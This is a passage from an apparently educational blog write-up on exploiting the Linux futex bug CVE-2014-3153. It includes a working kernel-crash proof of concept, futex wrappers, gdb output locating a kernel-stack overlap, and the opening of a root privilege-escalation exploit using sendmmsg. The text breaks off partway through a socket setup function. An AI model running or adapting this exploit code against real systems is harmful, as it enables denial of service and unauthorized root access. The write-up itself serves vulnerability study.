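    pos->prev->next = new_node;
    pos->prev = new_node;
}
```

<p>If <code class="language-plaintext highlighter-rouge">pos</code> is a forged node whose <code class="language-plaintext highlighter-rouge">prev</code> points at some pointer-sized slot, inserting a fresh node next to it stores the fresh node’s address into that slot. Reads can be built in a similar spirit from whatever the list code copies out of the forged node.</p>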
<h4 id="kernel-crash">Kernel Crash</h4>
<p>But let’s start small. For now we’ll just attempt to crash the kernel.</p>
<p>I wrote a program that implements the steps that we listed above.<br />
Let’s analyze it before going into the actual exploitation.
Here’s the <a href="https://github.com/elongl/CVE-2014-3153/blob/master/kernel_crash.c">code</a>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define CRASH_SEC 3
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">pid_t</span> <span class="n">pid</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="o">*</span><span class="n">futexes</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="o">*</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="o">*</span><span class="n">pi_futex</span><span class="p">;</span>
<span class="c1">// mmap() reports failure as MAP_FAILED, so compare against it explicitly.</span>
<span class="n">assert</span><span class="p">((</span><span class="n">futexes</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint32_t</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_SHARED</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">))</span> <span class="o">!=</span> <span class="n">MAP_FAILED</span><span class="p">);</span>
<span class="n">non_pi_futex</span> <span class="o">=</span> <span class="o">&</span><span class="n">futexes</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">pi_futex</span> <span class="o">=</span> <span class="o">&</span><span class="n">futexes</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="n">flock</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">);</span>
<span class="n">assert</span><span class="p">((</span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">())</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fwait_requeue</span><span class="p">(</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Child continues."</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Kernel will crash in %u seconds...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">CRASH_SEC</span><span class="p">);</span>
<span class="n">sleep</span><span class="p">(</span><span class="n">CRASH_SEC</span><span class="p">);</span>
<span class="n">frequeue</span><span class="p">(</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="o">*</span><span class="n">pi_futex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">frequeue</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">wait</span><span class="p">(</span><span class="nb">NULL</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The <code class="language-plaintext highlighter-rouge">flock</code>, <code class="language-plaintext highlighter-rouge">fwait_requeue</code>, and <code class="language-plaintext highlighter-rouge">frequeue</code> functions are implemented in a small <a href="https://github.com/elongl/CVE-2014-3153/blob/master/futex.c">futex wrappers</a> file that I’ve created to keep the code simple and easy on the eyes.</p>
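<p>For readers who don’t want to open the repository, here is a rough sketch of what such wrappers could look like on top of the raw <code class="language-plaintext highlighter-rouge">futex(2)</code> syscall. The function names (<code class="language-plaintext highlighter-rouge">futex_call</code>, <code class="language-plaintext highlighter-rouge">pi_lock</code>, <code class="language-plaintext highlighter-rouge">pi_unlock</code>, <code class="language-plaintext highlighter-rouge">wait_requeue_pi</code>, <code class="language-plaintext highlighter-rouge">cmp_requeue_pi</code>) and their argument order are my own assumptions for illustration and may differ from the linked file; only the <code class="language-plaintext highlighter-rouge">FUTEX_*</code> operations come from <code class="language-plaintext highlighter-rouge">&lt;linux/futex.h&gt;</code>.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <linux/futex.h>
#include <stddef.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <unistd.h>

/* glibc has no futex() wrapper, so go through syscall(2) directly. */
long futex_call(uint32_t *uaddr, int op, uint32_t val,
                unsigned long timeout_or_val2, uint32_t *uaddr2, uint32_t val3)
{
    return syscall(SYS_futex, uaddr, op, val, timeout_or_val2, uaddr2, val3);
}

/* FUTEX_LOCK_PI: acquire the PI futex; the kernel stores our TID in the word. */
long pi_lock(uint32_t *uaddr)
{
    return futex_call(uaddr, FUTEX_LOCK_PI, 0, 0, NULL, 0);
}

/* FUTEX_UNLOCK_PI: release a PI futex that the caller owns. */
long pi_unlock(uint32_t *uaddr)
{
    return futex_call(uaddr, FUTEX_UNLOCK_PI, 0, 0, NULL, 0);
}

/* FUTEX_WAIT_REQUEUE_PI: sleep on src (if *src == expected) until requeued to dst. */
long wait_requeue_pi(uint32_t *src, uint32_t *dst, uint32_t expected)
{
    return futex_call(src, FUTEX_WAIT_REQUEUE_PI, expected, 0, dst, 0);
}

/*
 * FUTEX_CMP_REQUEUE_PI: if *src == expected, wake one waiter (nr_wake must
 * be 1 for this operation) and requeue up to max_requeued others to dst.
 */
long cmp_requeue_pi(uint32_t *src, uint32_t *dst,
                    uint32_t max_requeued, uint32_t expected)
{
    return futex_call(src, FUTEX_CMP_REQUEUE_PI, 1, max_requeued, dst, expected);
}
```

<p>Each helper returns the raw syscall result, so <code class="language-plaintext highlighter-rouge">-1</code> with <code class="language-plaintext highlighter-rouge">errno</code> set indicates failure. After a successful uncontended <code class="language-plaintext highlighter-rouge">pi_lock()</code>, the futex-word holds the caller’s TID.</p>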
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">futexes</span> <span class="o">=</span> <span class="n">mmap</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">uint32_t</span><span class="p">)</span> <span class="o">*</span> <span class="mi">2</span><span class="p">,</span> <span class="n">PROT_READ</span> <span class="o">|</span> <span class="n">PROT_WRITE</span><span class="p">,</span> <span class="n">MAP_ANONYMOUS</span> <span class="o">|</span> <span class="n">MAP_SHARED</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>
<p>We start off by allocating <code class="language-plaintext highlighter-rouge">sizeof(uint32_t) * 2</code> bytes of R/W memory, which hold our two futexes.<br />
Mind the <code class="language-plaintext highlighter-rouge">MAP_SHARED</code> flag that is passed to the <code class="language-plaintext highlighter-rouge">mmap</code> call in order to signal that the memory
needs to be shared between the main process and the process that is spawned by the <code class="language-plaintext highlighter-rouge">fork()</code> call.</p>
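<p>The effect of <code class="language-plaintext highlighter-rouge">MAP_SHARED</code> is easy to check in isolation. The following is a small sketch, with <code class="language-plaintext highlighter-rouge">child_write_seen_by_parent()</code> being a hypothetical helper written just for this demonstration: a forked child writes into an anonymous mapping and the parent reports what it sees afterwards.</p>

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Map one uint32_t with the given sharing flag (MAP_SHARED or MAP_PRIVATE),
 * let a forked child store `value` into it, and return what the parent
 * reads back once the child has exited.
 */
uint32_t child_write_seen_by_parent(int sharing_flag, uint32_t value)
{
    uint32_t *word = mmap(NULL, sizeof(*word), PROT_READ | PROT_WRITE,
                          MAP_ANONYMOUS | sharing_flag, -1, 0);
    assert(word != MAP_FAILED);

    pid_t pid = fork();
    assert(pid != -1);
    if (pid == 0) {
        *word = value;          /* child writes into the mapping */
        _exit(EXIT_SUCCESS);
    }

    waitpid(pid, NULL, 0);      /* the child's write has happened by now */
    uint32_t seen = *word;
    munmap(word, sizeof(*word));
    return seen;
}
```

<p>With <code class="language-plaintext highlighter-rouge">MAP_SHARED</code> the parent reads the child’s value, whereas with <code class="language-plaintext highlighter-rouge">MAP_PRIVATE</code> the child writes to its own copy-on-write page and the parent still sees the zero-filled mapping. That is why the futexes must live in a shared mapping for the parent and child to operate on the same futex-words.</p>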
<p><em>Side-comment</em>: In the actual exploit you’ll see that I’m using <code class="language-plaintext highlighter-rouge">pthreads</code> rather than <code class="language-plaintext highlighter-rouge">fork()</code>, which makes the code much clearer,
and there’s no need to map shared memory since all threads share the same virtual address space.</p>
<ol>
<li>
<p>Lock the <code class="language-plaintext highlighter-rouge">pi_futex</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">flock</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">)</span>
</code></pre></div> </div>
</li>
<li>
<p>Spawn a child process and call <code class="language-plaintext highlighter-rouge">FUTEX_WAIT_REQUEUE_PI</code> from <code class="language-plaintext highlighter-rouge">non_pi_futex</code> to <code class="language-plaintext highlighter-rouge">pi_futex</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">assert</span><span class="p">((</span><span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">())</span> <span class="o">!=</span> <span class="o">-</span><span class="mi">1</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">pid</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fwait_requeue</span><span class="p">(</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"Child continues."</span><span class="p">);</span>
<span class="n">exit</span><span class="p">(</span><span class="n">EXIT_SUCCESS</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div> </div>
</li>
<li>
<p>We <code class="language-plaintext highlighter-rouge">sleep</code> only to ensure that the child process has already issued its <code class="language-plaintext highlighter-rouge">fwait_requeue</code>.
Afterwards, we requeue the waiter to the <code class="language-plaintext highlighter-rouge">pi_futex</code>.</p>
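<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sleep</span><span class="p">(</span><span class="n">CRASH_SEC</span><span class="p">);</span>
<span class="n">frequeue</span><span class="p">(</span><span class="n">non_pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</code></pre></div> </div>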
</li>
<li>
<p>Overwrite the userspace value of the <code class="language-plaintext highlighter-rouge">pi_futex</code> to <code class="language-plaintext highlighter-rouge">0</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">*</span><span class="n">pi_futex</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div> </div>
</li>
<li>
<p>Self-requeue.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">frequeue</span><span class="p">(</span><span class="n">pi_futex</span><span class="p">,</span> <span class="n">pi_futex</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
</code></pre></div> </div>
</li>
</ol>
<p>Now let’s see this in action.</p>
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/DxPt1MNPDpY" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe></center>
<p>If you paid attention to the call trace,
you would have spotted that the kernel crashes once the process itself terminates (<code class="language-plaintext highlighter-rouge">do_exit</code>).
When a process exits, the kernel cleans up its resources (<code class="language-plaintext highlighter-rouge">mm_release</code>), including the PI state list (<code class="language-plaintext highlighter-rouge">exit_pi_state_list</code>),
and in doing so it unlocks all the futexes that the process holds.
While releasing them, the kernel tries to unlock our corrupted waiter as well, which causes the crash.</p>
<p>To be more accurate, it occurs here.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span>
<span class="nf">rt_mutex_top_waiter</span><span class="p">(</span><span class="k">struct</span> <span class="n">rt_mutex</span> <span class="o">*</span><span class="n">lock</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">rt_mutex_waiter</span> <span class="o">*</span><span class="n">w</span><span class="p">;</span>
<span class="n">w</span> <span class="o">=</span> <span class="n">plist_first_entry</span><span class="p">(</span><span class="o">&</span><span class="n">lock</span><span class="o">-></span><span class="n">wait_list</span><span class="p">,</span> <span class="k">struct</span> <span class="n">rt_mutex_waiter</span><span class="p">,</span>
<span class="n">list_entry</span><span class="p">);</span>
<span class="n">BUG_ON</span><span class="p">(</span><span class="n">w</span><span class="o">-></span><span class="n">lock</span> <span class="o">!=</span> <span class="n">lock</span><span class="p">);</span> <span class="c1">// <-- KERNEL BUG</span>
<span class="k">return</span> <span class="n">w</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The function compares the lock that the top waiter claims to be waiting on with the actual lock.
Because the waiter is corrupted,
its <code class="language-plaintext highlighter-rouge">lock</code> member no longer points to the corresponding <code class="language-plaintext highlighter-rouge">rt_mutex</code>, so the <code class="language-plaintext highlighter-rouge">BUG_ON</code> check fires and the kernel crashes.</p>
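<p>To make the failing condition concrete, here is a minimal userspace sketch of the same comparison. The <code class="language-plaintext highlighter-rouge">model_lock</code> and <code class="language-plaintext highlighter-rouge">model_waiter</code> types are hypothetical stand-ins that I made up for illustration. They are not the kernel's structures and only keep the one pointer that matters here.</p>

```c
#include <stdbool.h>
#include <stddef.h>

/* Simplified, userspace-only stand-ins for rt_mutex and rt_mutex_waiter. */
struct model_lock;

struct model_waiter {
    struct model_lock *lock;   /* the lock this waiter claims to be blocked on */
};

struct model_lock {
    struct model_waiter *top;  /* first (highest priority) waiter on the list */
};

/*
 * Mirrors the condition inside BUG_ON(w->lock != lock).
 * Returns true when the kernel would hit the bug.
 */
bool top_waiter_is_corrupted(const struct model_lock *lock)
{
    return lock->top != NULL && lock->top->lock != lock;
}
```

<p>A waiter whose <code class="language-plaintext highlighter-rouge">lock</code> field points back at the lock passes the check. A stale one, whose memory has been reused and now points somewhere else, does not.</p>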
<h1 id="privilege-escalation">Privilege Escalation</h1>
<p>DoSing the system is pretty cool, but let’s make it more interesting by escalating to <code class="language-plaintext highlighter-rouge">root</code> privileges.</p>
<p>I intentionally do not post the entire exploit up front because that would most likely be overwhelming.
Instead, I’ll introduce the code in stages.<br />
If you prefer to have the entire exploit at hand, it can be found <a href="https://github.com/elongl/CVE-2014-3153/blob/master/privilege_escalation.c">here</a>.</p>
<h4 id="writing-to-the-waiter">Writing To The Waiter</h4>
<p>In order to make use of our dangling waiter, we first need to find a way to write to it.<br />
As a quick reminder, our waiter is placed on the kernel stack.
With that in mind, we need to somehow write a controlled buffer to the stack location that the waiter occupied.
Given that we’re just a userspace program, our way of writing data to the kernel’s stack is by issuing system calls.</p>
<p>But how do we know which syscall to invoke?<br />
Luckily for us, the kernel comes with a useful tool called <code class="language-plaintext highlighter-rouge">checkstack</code>.<br />
It can be found within the source under <code class="language-plaintext highlighter-rouge">scripts/checkstack.pl</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -d vmlinux | ./scripts/checkstack.pl i386 | grep -E "(futex_wait_requeue_pi|sys)"
0xc11206e6 do_sys_poll [vmlinux]: 932
0xc1120aa3 do_sys_poll [vmlinux]: 932
...
0xc1527388 ___sys_sendmsg [vmlinux]: 248
0xc15274d8 ___sys_sendmsg [vmlinux]: 248
0xc1527b1a ___sys_recvmsg [vmlinux]: 220
0xc1527c6b ___sys_recvmsg [vmlinux]: 220
0xc1087936 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1087a80 futex_wait_requeue_pi.constprop.21 [vmlinux]:212
0xc1529828 __sys_sendmmsg [vmlinux]: 184
0xc15298fe __sys_sendmmsg [vmlinux]: 184
...
</code></pre></div></div>
<p>The script lists the stack frame size, in bytes, of each function within the kernel.
This helps us estimate which syscall we should use in order to write to the memory that the waiter occupied.</p>
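<p>If you want to sort through that output programmatically, a small parser is enough. The sketch below assumes the line format shown in the listing above. The helper names <code class="language-plaintext highlighter-rouge">parse_checkstack_line</code> and <code class="language-plaintext highlighter-rouge">frame_size_gap</code> are my own and are not part of the kernel tree.</p>

```c
#include <stdio.h>
#include <stdlib.h>

/*
 * Parse one line of checkstack.pl output, for example
 *   "0xc1529828 __sys_sendmmsg [vmlinux]: 184"
 * On success, store the function name in `name` and return the frame size.
 * Return -1 if the line does not match the expected format.
 */
int parse_checkstack_line(const char *line, char name[64])
{
    unsigned long addr;
    int size;

    if (sscanf(line, "%lx %63s [vmlinux]: %d", &addr, name, &size) != 3)
        return -1;
    return size;
}

/* Rough first filter: how far apart are two frame sizes, in bytes? */
int frame_size_gap(int size, int target)
{
    return abs(size - target);
}
```

<p>Against the 212 bytes of <code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi</code>, this gives a gap of 8 for <code class="language-plaintext highlighter-rouge">___sys_recvmsg</code>, 28 for <code class="language-plaintext highlighter-rouge">__sys_sendmmsg</code>, and 36 for <code class="language-plaintext highlighter-rouge">___sys_sendmsg</code>. Frame size alone is only a hint, so the overlap still has to be confirmed in a debugger.</p>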
<p>We have two requirements for the system call we’re looking for.</p>
<ol>
<li>Its stack usage is deep enough to overlap with our dangling <code class="language-plaintext highlighter-rouge">rt_waiter</code>.</li>
<li>The local variable within the function that overlaps <code class="language-plaintext highlighter-rouge">rt_waiter</code> is controllable.</li>
</ol>
<p>The syscalls <code class="language-plaintext highlighter-rouge">sendmsg</code>, <code class="language-plaintext highlighter-rouge">recvmsg</code>, and <code class="language-plaintext highlighter-rouge">sendmmsg</code> are the closest to <code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi</code> in terms of stack usage.<br />
That should be a good place to start.
We’ll be using <code class="language-plaintext highlighter-rouge">sendmmsg</code> throughout the exploit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Breakpoint 1, futex_wait_requeue_pi (uaddr=uaddr@entry=0x80ff44c, flags=flags@entry=0x1, val=val@entry=0x0,
abs_time=abs_time@entry=0x0, uaddr2=uaddr2@entry=0x80ff450, bitset=0xffffffff) at kernel/futex.c:2285
(gdb) set $waiter = &rt_waiter
Breakpoint 2, ___sys_sendmsg (sock=sock@entry=0xc5dfea80, msg=msg@entry=0x80ff420, msg_sys=msg_sys@entry=0xc78cbef4,
flags=flags@entry=0x0, used_address=used_address@entry=0xc78cbf10) at net/socket.c:1979
(gdb) p $waiter
$12 = (struct rt_mutex_waiter *) 0xc78cbe2c
(gdb) p &iovstack
$11 = (struct iovec (*)[8]) 0xc78cbe08
(gdb) p sizeof(iovstack)
$13 = 0x40
(gdb) p &iovstack < $waiter < (char*)&iovstack + sizeof(iovstack)
$14 = 0x1 (True)
</code></pre></div></div>
<p>I set two breakpoints, at <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a> and <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a>, in order to understand which arguments we should pass to the <code class="language-plaintext highlighter-rouge">sendmmsg</code> syscall
so that <code class="language-plaintext highlighter-rouge">rt_waiter</code> is under our control.</p>
<p>When the breakpoint hits on <a href="https://elixir.bootlin.com/linux/v3.11.4/source/kernel/futex.c#L2285"><code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi()</code></a>, I do nothing besides storing the address of <code class="language-plaintext highlighter-rouge">rt_waiter</code> in <code class="language-plaintext highlighter-rouge">$waiter</code>.
When it hits on <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a>, I check for the address of the local variable <code class="language-plaintext highlighter-rouge">iovstack</code>, which is of type <code class="language-plaintext highlighter-rouge">struct iovec[8]</code>, and examine its size.</p>
<table>
<tbody>
<tr>
<td><strong>Variable</strong></td>
<td><strong>Address</strong></td>
</tr>
<tr>
<td><code class="language-plaintext highlighter-rouge">rt_waiter</code></td>
<td><code class="language-plaintext highlighter-rouge">0xc78cbe2c</code></td>
</tr>
<tr>
<td><code class="language-plaintext highlighter-rouge">iovstack</code></td>
<td><code class="language-plaintext highlighter-rouge">0xc78cbe08</code> - <code class="language-plaintext highlighter-rouge">0xc78cbe48</code></td>
</tr>
</tbody>
</table>
<p>This proves that <code class="language-plaintext highlighter-rouge">futex_wait_requeue_pi:rt_waiter</code> overlaps with <code class="language-plaintext highlighter-rouge">___sys_sendmsg:iovstack</code>.</p>
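<p>The same check can be done with plain arithmetic. The sketch below assumes the i386 layout, where a <code class="language-plaintext highlighter-rouge">struct iovec</code> is two 4-byte fields, and uses the addresses from the gdb session above. The <code class="language-plaintext highlighter-rouge">iov_slot</code> type and both helpers are names I made up for illustration.</p>

```c
#include <stdbool.h>
#include <stdint.h>

#define IOVEC32_SIZE 8u      /* sizeof(struct iovec) on i386: two 4-byte fields */
#define IOVSTACK_ENTRIES 8u  /* iovstack is declared as struct iovec[8] */

struct iov_slot {
    unsigned index;  /* which iovstack[] element the address falls in */
    bool is_len;     /* false: the iov_base field, true: the iov_len field */
};

/* True if addr lies inside [iovstack, iovstack + 8 * 8). */
bool in_iovstack(uint32_t iovstack, uint32_t addr)
{
    return addr >= iovstack &&
           addr - iovstack < IOVSTACK_ENTRIES * IOVEC32_SIZE;
}

/* Map a 4-byte aligned address inside iovstack to the element and field covering it. */
struct iov_slot slot_for(uint32_t iovstack, uint32_t addr)
{
    uint32_t off = addr - iovstack;
    struct iov_slot slot = { off / IOVEC32_SIZE, (off % IOVEC32_SIZE) >= 4 };
    return slot;
}
```

<p>With <code class="language-plaintext highlighter-rouge">iovstack</code> at <code class="language-plaintext highlighter-rouge">0xc78cbe08</code> and <code class="language-plaintext highlighter-rouge">rt_waiter</code> at <code class="language-plaintext highlighter-rouge">0xc78cbe2c</code>, the waiter starts <code class="language-plaintext highlighter-rouge">0x24</code> bytes into the array, which is the <code class="language-plaintext highlighter-rouge">iov_len</code> field of <code class="language-plaintext highlighter-rouge">iovstack[4]</code>.</p>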
<p>Let’s take a look at <code class="language-plaintext highlighter-rouge">sendmmsg</code>’s signature.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">sendmmsg</span><span class="p">(</span><span class="kt">int</span> <span class="n">sockfd</span><span class="p">,</span> <span class="k">struct</span> <span class="n">mmsghdr</span> <span class="o">*</span><span class="n">msgvec</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">vlen</span><span class="p">,</span>
<span class="kt">int</span> <span class="n">flags</span><span class="p">);</span>
<span class="k">struct</span> <span class="n">mmsghdr</span>
<span class="p">{</span>
<span class="k">struct</span> <span class="n">msghdr</span> <span class="n">msg_hdr</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">msg_len</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">msghdr</span>
<span class="p">{</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">msg_name</span><span class="p">;</span>
<span class="n">socklen_t</span> <span class="n">msg_namelen</span><span class="p">;</span>
<span class="k">struct</span> <span class="n">iovec</span> <span class="o">*</span><span class="n">msg_iov</span><span class="p">;</span> <span class="c1">// <-- iovstack</span>
<span class="kt">size_t</span> <span class="n">msg_iovlen</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">msg_control</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">msg_controllen</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">msg_flags</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">iovec</span>
<span class="p">{</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">iov_base</span><span class="p">;</span>
<span class="kt">size_t</span> <span class="n">iov_len</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<p>At this point I suggest understanding the syscall itself.</p>
<blockquote>
<p>The sendmmsg() system call is an extension of sendmsg(2) that
allows the caller to transmit multiple messages on a socket using
a single system call. (This has performance benefits for some
applications.)</p>
</blockquote>
<p>The arguments are straightforward and essentially the same as those of <code class="language-plaintext highlighter-rouge">sendmsg</code>, except that <code class="language-plaintext highlighter-rouge">msgvec</code> points to an array of <code class="language-plaintext highlighter-rouge">mmsghdr</code> structures, each of which wraps a single <code class="language-plaintext highlighter-rouge">msghdr</code>.<br />
If you’re unfamiliar with the syscall, give it a read at <a href="https://man7.org/linux/man-pages/man2/sendmmsg.2.html"><code class="language-plaintext highlighter-rouge">man sendmmsg(2)</code></a>.</p>
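<p>Since each <code class="language-plaintext highlighter-rouge">mmsghdr</code> wraps an ordinary <code class="language-plaintext highlighter-rouge">msghdr</code>, the part worth getting comfortable with is the <code class="language-plaintext highlighter-rouge">msg_iov</code> array. Here is a minimal sketch that uses plain <code class="language-plaintext highlighter-rouge">sendmsg</code> to send two buffers in one call. The function name <code class="language-plaintext highlighter-rouge">gather_roundtrip</code> and the buffer contents are my own choices for the demonstration.</p>

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/*
 * Send two buffers with a single sendmsg() call over a fresh socketpair and
 * read them back into `out`. Returns the number of bytes received, or -1.
 */
ssize_t gather_roundtrip(char *out, size_t outlen)
{
    int fds[2];
    char first[] = "AAAA", second[] = "BBBB";
    struct iovec iov[2] = {
        { .iov_base = first,  .iov_len = 4 },
        { .iov_base = second, .iov_len = 4 },
    };
    struct msghdr hdr;
    ssize_t got = -1;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, fds) != 0)
        return -1;

    memset(&hdr, 0, sizeof(hdr));
    hdr.msg_iov = iov;   /* this array is what ends up in the kernel's iovstack */
    hdr.msg_iovlen = 2;

    /* Both buffers go out as one 8-byte write. */
    if (sendmsg(fds[0], &hdr, 0) == 8)
        got = recv(fds[1], out, outlen, 0);

    close(fds[0]);
    close(fds[1]);
    return got;
}
```

<p>The receiver sees <code class="language-plaintext highlighter-rouge">AAAABBBB</code>. For the exploit the payload itself is irrelevant. What matters is that the kernel copies the <code class="language-plaintext highlighter-rouge">iovec</code> entries we supply onto its own stack.</p>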
<p>In order to invoke <code class="language-plaintext highlighter-rouge">sendmmsg</code> successfully, we’d need a pair of connected sockets that we can send the data to.
It is very important to understand that we want <a href="https://elixir.bootlin.com/linux/v3.11.4/source/net/socket.c#L1976"><code class="language-plaintext highlighter-rouge">___sys_sendmsg()</code></a> to <strong>block</strong> so that we can take advantage of the waiter’s corrupted state while it’s under our control.</p>
<p>Typically, the function sends the data over the socket and exits.
In order to make it block, we’d need to use <code class="language-plaintext highlighter-rouge">SOCK_STREAM</code> as our socket type which provides a <em>reliable connection-based</em> byte stream.
This grants us the blocking capabilities we’ve talked about.
On top of that, we’d need to fill up the “send buffer” so that data can’t be sent over the socket, unless data is read on the other end.</p>
<p>I’ve crafted a function that does just that.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define BLOCKBUF "AAAAAAAA"
#define BLOCKBUFLEN strlen(BLOCKBUF)
</span>
<span class="kt">int</span> <span class="n">client_sockfd</span><span class="p">,</span> <span class="n">server_sockfd</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">setup_sockets</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">fds</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>
<span class="n">puts</span><span class="p">(</span><span class="n">USERLOG</span> <span class="s">"Creating a pair of sockets for kernel stack modification using blocking I/O."</span><span class="p">);</span>
<span class="n">assert</span><span class="p">(</span><span class="o">!</span><span class="n">socketpair</span><span class="p">(</span><span class="n">AF_UNIX</span><span class="p">,</span> <span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">fds</span><span class="p">));</span>
<span class="n">client_sockfd</span> <span class="o">=</span> <span class="n">fds</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="n">server_sockfd</span> <span class="o">=</span> <span class="n">fds</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
